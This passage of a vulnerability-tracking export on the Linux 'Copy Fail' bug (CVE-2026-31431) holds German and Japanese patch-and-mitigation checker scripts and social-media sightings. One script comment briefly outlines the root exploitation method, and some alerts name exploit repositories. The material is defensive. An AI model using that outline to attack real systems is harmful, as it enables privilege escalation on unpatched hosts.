\"Frage $API_URL ab...\"  \n    JSON=$(curl -fsSL --max-time 10 \"$API_URL\" 2>/dev/null || echo \"\")  \n\n    if [ -n \"$JSON\" ]; then  \n        # --- 3a: kmod-Mitigation (USN-8226-1) pr\u00fcfen ------------------------\n        # Ubuntu liefert die Mitigation aktuell nur \u00fcber das kmod-Paket,\n        # das algif_aead via modprobe.d blockiert. Das steht in 'notices'. \n        KMOD_FIX_VER=$(printf '%s' \"$JSON\" | REL=\"$RELEASE_CODENAME\" python3 -c '  \nimport json, sys, os\ntry: data = json.load(sys.stdin)\nexcept Exception: sys.exit(0)\nrel = os.environ[\"REL\"]  \nfor n in data.get(\"notices\", []):  \n    rps = n.get(\"release_packages\", {}).get(rel, [])  \n    for p in rps:\n        if p.get(\"name\") == \"kmod\" and p.get(\"is_source\"):  \n            print(p.get(\"version\", \"\")); sys.exit(0)  \n' 2>/dev/null)  \n\n        if [ -n \"$KMOD_FIX_VER\" ]; then  \n            INSTALLED_KMOD=$(dpkg-query -W -f='${Version}' kmod 2>/dev/null || echo \"\")  \n            if [ -n \"$INSTALLED_KMOD\" ]; then  \n                if dpkg --compare-versions \"$INSTALLED_KMOD\" ge \"$KMOD_FIX_VER\"; then  \n                    ok \"kmod-Mitigation ist installiert (USN-8226-1).\"  \n                    KMOD_FIX_STATUS=\"patched\"  \n                else\n                    vuln \"kmod-Mitigation FEHLT \u2014 installiert: $INSTALLED_KMOD, ben\u00f6tigt: $KMOD_FIX_VER\"  \n                    KMOD_FIX_STATUS=\"vulnerable\"  \n                fi\n            else\n                warn \"kmod-Paket nicht gefunden \u2014 Mitigation-Status unklar.\"  \n            fi\n        fi\n\n        # --- 3b: Kernel-Patch pr\u00fcfen ----------------------------------------\n        CANDIDATES=\"$SOURCE_PKG_TRACK\"  \n        case \"$SOURCE_PKG_TRACK\" in  \n            linux-hwe-*|linux-hwe)\n                CANDIDATES=\"$CANDIDATES linux-hwe linux\"  \n                ;;\n            linux-aws*|linux-azure*|linux-gcp*|linux-oracle*)\n                CANDIDATES=\"$CANDIDATES linux\"  \n                ;;\n        esac\n\n        RESULT=\"\"  \n        MATCHED_PKG=\"\"  \n        if [ -n \"$SOURCE_PKG_TRACK\" ]; then  \n            for cand in $CANDIDATES; do\n                R=$(printf '%s' \"$JSON\" | SRC=\"$cand\" REL=\"$RELEASE_CODENAME\" python3 -c '  \nimport json, sys, os\ntry: data = json.load(sys.stdin)\nexcept Exception as e: print(\"ERROR|\"+str(e)); sys.exit(0)  \nsrc = os.environ[\"SRC\"]; rel = os.environ[\"REL\"]  \nfor pkg in data.get(\"packages\", []):  \n    if pkg.get(\"name\") != src: continue  \n    for st in pkg.get(\"statuses\", []):  \n        if st.get(\"release_codename\") == rel:  \n            print(f\"{st.get(\\\"status\\\",\\\"?\\\")}|{st.get(\\\"description\\\",\\\"\\\") or \\\"\\\"}\")  \n            sys.exit(0)\nprint(\"not_found|\")  \n' 2>/dev/null)  \n                S=$(echo \"$R\" | cut -d'|' -f1)  \n                if [ \"$S\" != \"not_found\" ] && [ \"$S\" != \"ERROR\" ] && [ -n \"$S\" ]; then  \n                    RESULT=\"$R\"; MATCHED_PKG=\"$cand\"; break  \n                fi\n            done\n        fi\n\n        [ -z \"$RESULT\" ] && RESULT=\"not_found|\"  \n        STATUS=$(echo \"$RESULT\" | cut -d'|' -f1)  \n        DESCR=$(echo \"$RESULT\" | cut -d'|' -f2-)  \n        [ -n \"$MATCHED_PKG\" ] && [ \"$MATCHED_PKG\" != \"$SOURCE_PKG_TRACK\" ] && info \"Kernel-Treffer unter Fallback: $MATCHED_PKG\"  \n\n        case \"$STATUS\" in  \n            released)\n                ok \"Kernel-Patch verf\u00fcgbar.\"  \n                [ -n \"$DESCR\" ] && info \"Gefixte Kernel-Version: $DESCR\"  \n                FIXED_VER=\"$DESCR\"  \n                if [ -n \"$INSTALLED_VER\" ] && [ -n \"$FIXED_VER\" ]; then  \n                    if dpkg --compare-versions \"$INSTALLED_VER\" ge \"$FIXED_VER\"; then  \n                        ok \"Kernel installiert ($INSTALLED_VER) >= Fix ($FIXED_VER) \u2192 GEPATCHT\"  \n                        PATCH_STATUS=\"patched\"  \n                    else\n                        vuln \"Kernel installiert ($INSTALLED_VER) < Fix ($FIXED_VER)\"  \n                        PATCH_STATUS=\"vulnerable\"  \n                    fi\n                fi\n                ;;\n            needed|pending|deferred)\n                info \"Kernel-Patch von Ubuntu: noch nicht ver\u00f6ffentlicht.\"  \n                info \"(Status im Tracker: $STATUS)\"  \n                PATCH_STATUS=\"kernel_pending\"  \n                ;;\n            \"not-affected\"|DNE)  \n                ok \"Kernel-Status: $STATUS \u2014 Release/Paket ist nicht betroffen.\"  \n                PATCH_STATUS=\"not_affected\"  \n                ;;\n            ignored)\n                warn \"Kernel-Status: ignored \u2014 siehe Ubuntu-Tracker.\"  \n                ;;\n            ERROR|not_found|\"\")  \n                info \"Kernel-Patch von Ubuntu: noch nicht ver\u00f6ffentlicht.\"  \n                PATCH_STATUS=\"kernel_pending\"  \n                ;;\n            *)\n                warn \"Unbekannter Status: $STATUS\"  \n                ;;\n        esac\n    else\n        warn \"API-Abruf fehlgeschlagen \u2014 Internetverbindung pr\u00fcfen.\"  \n    fi\nelse\n    warn \"API-Check \u00fcbersprungen (fehlende Daten oder Tools).\"  \nfi\necho\n\n# --- 4. algif_aead Modul-Status ----------------------------------------------\necho \"${B}[4/5] algif_aead Modul${N}\"  \nMOD_LOADED=0\nif lsmod 2>/dev/null | grep -q '^algif_aead'; then  \n    MOD_LOADED=1\nfi\n\nBLACKLISTED=0\nif grep -rqsE '^(blacklist[[:space:]]+algif_aead|install[[:space:]]+algif_aead[[:space:]]+/bin/(false|true))' /etc/modprobe.d/ /usr/lib/modprobe.d/ /run/modprobe.d/ 2>/dev/null; then  \n    BLACKLISTED=1\nfi\n\n# Zusammenfassende Bewertung der beiden Checks\nif [ \"$MOD_LOADED\" -eq 0 ] && [ \"$BLACKLISTED\" -eq 1 ]; then  \n    ok \"Modul ist nicht geladen und blockiert \u2014 Angriffsweg zu.\"  \nelif [ \"$MOD_LOADED\" -eq 1 ] && [ \"$BLACKLISTED\" -eq 1 ]; then  \n    warn \"Modul ist GELADEN, obwohl blockiert \u2014 wird beim n\u00e4chsten Reboot entladen.\"  \nelif [ \"$MOD_LOADED\" -eq 0 ] && [ \"$BLACKLISTED\" -eq 0 ]; then  \n    warn \"Modul ist nicht geladen, aber NICHT blockiert \u2014 kann jederzeit nachgeladen werden!\"  \nelse\n    vuln \"Modul ist GELADEN und nicht blockiert \u2014 System angreifbar!\"  \nfi\necho\n\n# --- 5. Gesamtbewertung -------------------------------------------------------\necho \"${B}[5/5] Gesamtbewertung${N}\"  \necho\n\ncase \"$PATCH_STATUS\" in  \n    patched)\n        if [ \"$REBOOT_PENDING\" -eq 1 ]; then  \n            echo \"  ${B}${Y}\u00bb Status: TEILWEISE GESCH\u00dcTZT \u2014 REBOOT N\u00d6TIG${N}\"  \n            echo\n            echo \"  ${B}Aktion:${N} sudo reboot  (sobald m\u00f6glich)\"  \n            if [ \"$VERBOSE\" -eq 1 ]; then  \n                echo\n                echo \"  Der gepatchte Kernel ist installiert, aber noch nicht aktiv.\"  \n                echo \"  Aktuell l\u00e4uft noch der alte Kernel.\"  \n                if [ \"$BLACKLISTED\" -eq 1 ] && [ \"$MOD_LOADED\" -eq 0 ]; then  \n                    echo \"  ${G}Bis zum Reboot sch\u00fctzt dich die Modul-Blacklist.${N}\"  \n                else\n                    echo \"  ${R}ACHTUNG: Ohne Modul-Blacklist bist du bis zum Reboot verwundbar!${N}\"  \n                fi\n            fi\n        else\n            echo \"  ${B}${G}\u00bb Status: VOLL GESCH\u00dcTZT (Kernel-Patch aktiv)${N}\"  \n            verbose \"\"  \n            verbose \"  Der gepatchte Kernel l\u00e4uft. Keine weitere Aktion n\u00f6tig.\"  \n        fi\n        ;;\n\n    not_affected)\n        echo \"  ${B}${G}\u00bb Status: NICHT BETROFFEN${N}\"  \n        ;;\n\n    kernel_pending)\n        if [ \"$KMOD_FIX_STATUS\" = \"patched\" ] && [ \"$BLACKLISTED\" -eq 1 ] && [ \"$MOD_LOADED\" -eq 0 ]; then  \n            echo \"  ${B}${G}\u00bb Status: GESCH\u00dcTZT (durch Mitigation, JETZT)${N}\"  \n            if [ \"$VERBOSE\" -eq 1 ]; then  \n                echo\n                echo \"  ${B}Bist du jetzt sicher?${N} ${G}Ja, ab sofort.${N}\"  \n                echo \"  Der Angriff braucht das Kernel-Modul 'algif_aead'.\"  \n                echo \"  Dieses Modul ist nicht geladen UND kann nicht geladen werden\"  \n                echo \"  (Ubuntu hat es via kmod-Update USN-8226-1 blockiert).\"  \n                echo \"  \u2192 Der Angriffsweg ist ohne Reboot zu.\"  \n                echo\n                if [ \"$REBOOT_PENDING\" -eq 1 ]; then  \n                    echo \"  ${B}Reboot ausstehend \u2014 was bedeutet das?${N}\"  \n                    echo \"  Der Reboot-Hinweis stammt von einem ANDEREN Update,\"  \n                    echo \"  nicht vom Copy-Fail-Schutz. Du solltest trotzdem\"  \n                    echo \"  bei Gelegenheit neu starten, aber es ist kein Notfall.\"  \n                    echo\n                fi\n                echo \"  ${B}Was steht noch aus?${N}\"  \n                echo \"  Ubuntu wird einen echten Kernel-Patch nachliefern.\"  \n                echo \"  Sobald der da ist, einfach 'apt upgrade' + Reboot.\"  \n                echo \"  Bis dahin reicht die jetzige Mitigation aus.\"  \n                echo\n                echo \"  ${B}Hinweis:${N} 'apt upgrade' bringt aktuell KEINEN Kernel-Fix\"  \n                echo \"  f\u00fcr diese CVE \u2014 Ubuntu hat ihn schlicht noch nicht released.\"  \n                echo \"  Du bist trotzdem voll gesch\u00fctzt.\"  \n            fi\n        elif [ \"$BLACKLISTED\" -eq 1 ] && [ \"$MOD_LOADED\" -eq 0 ]; then  \n            echo \"  ${B}${Y}\u00bb Status: GESCH\u00dcTZT (manuelle Mitigation)${N}\"  \n            if [ \"$VERBOSE\" -eq 1 ]; then  \n                echo\n                echo \"  Modul-Blacklist greift, aber das offizielle kmod-Update\"  \n                echo \"  scheint nicht installiert zu sein. Empfehlung:\"  \n                echo \"    sudo apt update && sudo apt upgrade\"  \n            fi\n        else\n            echo \"  ${B}${R}\u00bb Status: VERWUNDBAR \u2014 JETZT HANDELN!${N}\"  \n            echo\n            echo \"  ${B}Sofort ausf\u00fchren:${N}\"  \n            echo \"    sudo apt update && sudo apt upgrade\"  \n            if [ \"$VERBOSE\" -eq 1 ]; then  \n                echo\n                echo \"  ${B}Falls Update nicht m\u00f6glich, manuelle Notfall-Mitigation:${N}\"  \n                echo \"    echo 'install algif_aead /bin/false' | \\\\\"  \n                echo \"      sudo tee /etc/modprobe.d/disable-algif_aead.conf\"  \n                echo \"    sudo rmmod algif_aead 2>/dev/null || true\"  \n            fi\n        fi\n        ;;\n\n    vulnerable)\n        if [ \"$BLACKLISTED\" -eq 1 ] && [ \"$MOD_LOADED\" -eq 0 ]; then  \n            echo \"  ${B}${Y}\u00bb Status: GESCH\u00dcTZT (Mitigation), aber Patch fehlt${N}\"  \n            echo\n            echo \"  ${B}Aktion:${N} sudo apt update && sudo apt upgrade && sudo reboot\"  \n            verbose \"\"  \n            verbose \"  Modul-Blacklist greift, daher kein akutes Risiko.\"  \n            verbose \"  Trotzdem zeitnah patchen.\"  \n        else\n            echo \"  ${B}${R}\u00bb Status: VERWUNDBAR \u2014 JETZT HANDELN!${N}\"  \n            echo\n            echo \"  ${B}Sofort ausf\u00fchren:${N} sudo apt update && sudo apt upgrade && sudo reboot\"  \n        fi\n        ;;\n\n    *)\n        echo \"  ${B}${Y}\u00bb Status: UNKLAR \u2014 bitte manuell pr\u00fcfen${N}\"  \n        echo\n        echo \"  $API_URL\"  \n        ;;\nesac\necho\n[ \"$VERBOSE\" -eq 0 ] && echo \"  (Mehr Details: $0 --verbose)\"  \necho\nexit 0\n", "creation_timestamp": "2026-05-11T08:18:58.000000Z"}, {"uuid": "612d86de-2d16-4b6d-bb4f-93affa576992", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/HPf4rnJhTXs3qYpqLaPVxvSy_pHWUyjw5EcKhHnizBFydaU", "content": "", "creation_timestamp": "2026-05-10T09:00:05.000000Z"}, {"uuid": "1754b660-bf10-4f69-90ec-ae118f967753", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/2GOBEcnqip1k_nIIvIE3w-bxwIdIiVvDIafo-Jg_nC3bf9M", "content": "", "creation_timestamp": "2026-05-09T21:00:04.000000Z"}, {"uuid": "d2f6c4de-e8c3-469e-95d4-65da64550be8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/Yr-1pp_OQlsAxCk9olefEOIlRJklCfDEolOYJn0mNy08hY4", "content": "", "creation_timestamp": "2026-05-09T09:00:04.000000Z"}, {"uuid": "a886e7ba-6f6e-4eb8-b6d6-c51d5ad6704f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/r-netsec.bsky.social/post/3mlldulp66i2v", "content": "Copy Fail (CVE-2026-31431): A Technical Deep Dive", "creation_timestamp": "2026-05-11T13:09:33.273758Z"}, {"uuid": "b4a50634-fe68-405e-a54e-872ca6e2e382", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/corti.com/post/3mllff67ukb25", "content": "I just wrote about CopyFail (CVE-2026-31431): Why a Tiny Linux Kernel Bug Became a Massive Infrastructure Threat corti.com/copyfail-cve...", "creation_timestamp": "2026-05-11T13:36:43.665939Z"}, {"uuid": "3a735d32-12fb-4823-8771-db5ddcbb731e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/sascha.corti.com.ap.brid.gy/post/3mllfdyfzfoa2", "content": "A newly disclosed Linux kernel vulnerability dubbed CopyFail (CVE-2026-31431) has quickly become one of the most serious Linux privilege escalation flaws in recent years. The bug allows an unprivileged local user to gain full root access on a vast number of Linux systems released since 2017 \u2014 [\u2026]", "creation_timestamp": "2026-05-11T13:37:31.971211Z"}, {"uuid": "c224fb43-cf6b-4c3b-9977-af64b3dd9874", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/flatcar.org/post/3mllmpud73c2k", "content": "Flatcar is unaffected by Copy Fail (CVE-2026-31431)! \n\nThe kernel option causing it was never enabled, because Flatcar is minimal by design and only ships what containers need\n\nSometimes the best mitigation is to reduce the attack surface by not shipping vulnerable components \ud83d\udd12", "creation_timestamp": "2026-05-11T15:48:25.195953Z"}, {"uuid": "01fa30cf-a889-4484-b979-fc5f5f15b851", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/almalinux.org/post/3mllp4ry7bu22", "content": "Lavender Lion has landed! AlmaLinux 10.2 Beta is live; already patched for CVE-2026-31431 before you even asked. \n\nNew packages, updated containers, all arches. Get the full release notes and learn how you can help us test: almalinux.org/blog/2026-05...", "creation_timestamp": "2026-05-11T16:31:16.017453Z"}, {"uuid": "2736930c-72d4-492f-a196-f6fb5301cc99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mllqaic7wc2y", "content": "Three Linux kernel flaws (CVE-2026-23004, CVE-2026-23204, CVE-2026-31431) let local users escalate privileges on SUSE systems. Read more- > tinyurl.com/mr3wx5we  #Security", "creation_timestamp": "2026-05-11T16:50:59.785934Z"}, {"uuid": "4e7bc994-286b-497b-b46f-22708aef2621", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/83783", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a vcheck\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a krisiasty\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Go\n\u2b50 Star\u6570\u91cf\uff1a 2  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-11 09:35:59\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nVulnerability detection and mitigation tool for Copy Fail and Dirty Frag bugs (CVE-2026-31431, CVE-2026-43284, CVE-2026-43500)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-11T10:00:04.000000Z"}, {"uuid": "f0e5dbf5-cbf6-4fb8-9f98-72e290096c01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/83838", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CopyFile_CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a dgrobinson0\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-11 17:58:36\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nExploit for CVE-2026-31431 (Copy Fail)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-11T18:00:04.000000Z"}, {"uuid": "f0b9b8c0-323d-4f8a-8a59-8fdcf1da7d8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/83790", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a linux-copy-fail-CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a adilkurtulmus\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-11 10:51:16\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-11T11:00:04.000000Z"}, {"uuid": "8397357f-c77b-4af6-8413-0ef177266278", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/e8LfDRtTf8nzcOa5URmJo_p6nGHeOtUQSV0vmQsSJYMEaqg", "content": "", "creation_timestamp": "2026-05-11T21:00:05.000000Z"}, {"uuid": "dff065d6-ed12-47f6-b7a2-b25170a6ac4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/Kuri0421/408ce4a31edcb7d83c9bac0f7f81dae4", "content": "#!/usr/bin/env bash\n# =============================================================================\n# CVE-2026-31431 (\"Copy Fail\") \u5bfe\u7b56\u72b6\u6cc1\u30c1\u30a7\u30c3\u30af\u30b9\u30af\u30ea\u30d7\u30c8\n#\n# \u8106\u5f31\u6027\u6982\u8981:\n#   Linux \u30ab\u30fc\u30cd\u30eb\u306e algif_aead \u30e2\u30b8\u30e5\u30fc\u30eb\u306e\u30ed\u30b8\u30c3\u30af\u6b20\u9665\u306b\u3088\u308a\u3001\n#   \u975e\u7279\u6a29\u30e6\u30fc\u30b6\u30fc\u304c AF_ALG \u30bd\u30b1\u30c3\u30c8 + splice() \u3092\u7d44\u307f\u5408\u308f\u305b\u3066\n#   \u30da\u30fc\u30b8\u30ad\u30e3\u30c3\u30b7\u30e5\u4e0a\u306e\u4efb\u610f\u30d5\u30a1\u30a4\u30eb\u306b 4 \u30d0\u30a4\u30c8\u3092\u66f8\u304d\u8fbc\u307f root \u3092\u53d6\u5f97\u53ef\u80fd\u3002\n#\n# \u5f71\u97ff\u7bc4\u56f2:\n#   \u30ab\u30fc\u30cd\u30eb 4.14 \u301c 6.18.21 (6.18.22 \u672a\u6e80)\n#   \u30ab\u30fc\u30cd\u30eb 6.19.x           (6.19.12 \u672a\u6e80)\n#\n# \u4fee\u6b63\u30b3\u30df\u30c3\u30c8: fafe0fa2995a  (2026\u5e744\u6708)\n# CVSS \u30b9\u30b3\u30a2:  7.8 (HIGH)\n# =============================================================================\n\nset -euo pipefail\n\n# \u2500\u2500 \u30ab\u30e9\u30fc\u5b9a\u7fa9 \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nRED='\\033[0;31m'; YELLOW='\\033[0;33m'; GREEN='\\033[0;32m'\nCYAN='\\033[0;36m'; BOLD='\\033[1m'; RESET='\\033[0m'\n\ninfo()    { echo -e \"${CYAN}[INFO]${RESET}  $*\"; }\nok()      { echo -e \"${GREEN}[OK]${RESET}    $*\"; }\nwarn()    { echo -e \"${YELLOW}[WARN]${RESET}  $*\"; }\nfail()    { echo -e \"${RED}[VULN]${RESET}  $*\"; }\nsection() { echo -e \"\\n${BOLD}$*${RESET}\"; echo \"$(printf '\u2500%.0s' {1..60})\"; }\n\n# \u2500\u2500 \u30d0\u30fc\u30b8\u30e7\u30f3\u6bd4\u8f03\u30d8\u30eb\u30d1\u30fc \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n# usage: ver_ge A B  \u2192 true if A >= B (\u5404\u8981\u7d20\u306f\u6570\u5024)\nver_ge() {\n    local -a a b\n    IFS='.' read -ra a <<< \"$1\"\n    IFS='.' read -ra b <<< \"$2\"\n    local i\n    for i in \"${!b[@]}\"; do\n        local av=${a[$i]:-0} bv=${b[$i]:-0}\n        (( av > bv )) && return 0\n        (( av < bv )) && return 1\n    done\n    return 0  # equal \u2192 true\n}\n\n# \u2500\u2500 \u7d50\u679c\u30d5\u30e9\u30b0 \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nVULN_VERSION=0\nAFALG_REACHABLE=0\nAEAD_REACHABLE=0\nOVERALL=0   # 0=safe, 1=vulnerable, 2=needs-attention\n\n# \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\nsection \"1. \u57fa\u672c\u60c5\u5831\"\n# \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\n\nKERNEL_FULL=$(uname -r)\nKERNEL_VER=$(echo \"$KERNEL_FULL\" | grep -oE '^[0-9]+\\.[0-9]+\\.[0-9]+')\nKERNEL_MAJOR=$(echo \"$KERNEL_VER\" | cut -d. -f1)\nKERNEL_MINOR=$(echo \"$KERNEL_VER\" | cut -d. -f2)\nKERNEL_PATCH=$(echo \"$KERNEL_VER\" | cut -d. -f3)\nARCH=$(uname -m)\n\ninfo \"\u30ab\u30fc\u30cd\u30eb\u30d0\u30fc\u30b8\u30e7\u30f3 : ${KERNEL_FULL}\"\ninfo \"\u30a2\u30fc\u30ad\u30c6\u30af\u30c1\u30e3     : ${ARCH}\"\n\n# OS\u60c5\u5831\nif [[ -f /etc/os-release ]]; then\n    . /etc/os-release\n    info \"OS                : ${PRETTY_NAME:-Unknown}\"\nfi\n\n# \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\nsection \"2. \u30ab\u30fc\u30cd\u30eb\u30d0\u30fc\u30b8\u30e7\u30f3\u30c1\u30a7\u30c3\u30af\"\n# \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\n\n# Linux \u4ee5\u5916\u306f\u30b9\u30ad\u30c3\u30d7\nif [[ \"$(uname -s)\" != \"Linux\" ]]; then\n    ok \"Linux \u3067\u306f\u3042\u308a\u307e\u305b\u3093 \u2014 CVE-2026-31431 \u306e\u5bfe\u8c61\u5916\u3067\u3059\u3002\"\n    exit 0\nfi\n\n# \u30ab\u30fc\u30cd\u30eb\u304c 4.14 \u3088\u308a\u53e4\u3044\u5834\u5408\u306f\u30d0\u30b0\u81ea\u4f53\u304c\u672a\u5c0e\u5165\nif ! ver_ge \"$KERNEL_VER\" \"4.14.0\"; then\n    ok \"\u30ab\u30fc\u30cd\u30eb ${KERNEL_VER} \u306f 4.14 \u672a\u6e80 \u2192 \u8106\u5f31\u306a\u30b3\u30fc\u30c9\u304c\u5b58\u5728\u3057\u307e\u305b\u3093 (\u5bfe\u8c61\u5916)\"\n    OVERALL=0\n# 6.20 \u4ee5\u964d\u306f\u4fee\u6b63\u6e08\u307f\nelif ver_ge \"$KERNEL_VER\" \"6.20.0\"; then\n    ok \"\u30ab\u30fc\u30cd\u30eb ${KERNEL_VER} \u306f 6.20 \u4ee5\u964d \u2192 \u4fee\u6b63\u6e08\u307f\u30d0\u30fc\u30b8\u30e7\u30f3\u3067\u3059\"\n    OVERALL=0\n# 6.19.x \u306e\u78ba\u8a8d\nelif [[ \"$KERNEL_MAJOR\" -eq 6 && \"$KERNEL_MINOR\" -eq 19 ]]; then\n 